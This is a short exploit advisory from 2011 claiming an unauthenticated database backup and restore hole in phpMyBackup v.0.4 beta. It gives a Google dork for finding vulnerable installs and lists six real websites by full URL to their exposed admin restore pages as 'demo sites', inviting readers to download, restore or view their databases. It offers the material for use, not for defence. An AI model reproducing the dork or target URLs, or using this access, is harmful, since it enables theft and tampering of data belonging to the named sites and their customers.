# Exploit Title:phpMyBackup v.0.4 beta Remote Backup DB Vulnerability # Date: 19/7/2011 # Author: Angel Injection # home Page: http://www.club-h.co.cc # Email: Angel-Injection[at]hotmail[Dot]com # Vendor or Software Link:www.phpmybackuppro.net # Version: v.0.4 beta # Category:: webapps # Google dork: intitle:"Backup-Management (phpMyBackup v.0.4 beta * )" -johnny.ihackstuff # Tested on: Linux Back Track 5 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Demo Sites http://www.balancia-verlag.de/shop/shop/Admin/ADMIN_restore.php http://www.tastaturaufkleber.biz/shop/Admin/ADMIN_restore.php http://www.inbusoft.com/pepper/shop/Admin/ADMIN_restore.php http://www.strolli.de/seiten/SHOP/shop/Admin/ADMIN_restore.php http://fwp.wohnideenshop.de/shop/Admin/ADMIN_restore.php http://www.med-ec.ch/shop/shop/Admin/ADMIN_restore.php Exploit You Can Download Database 0r Restore DB 0r View Database Enjoy @_@ -- ------ ---------- ----------- ------- ------------- ------- --------- ------ ---- Thanks to all the people of Iraq And Club Hack Team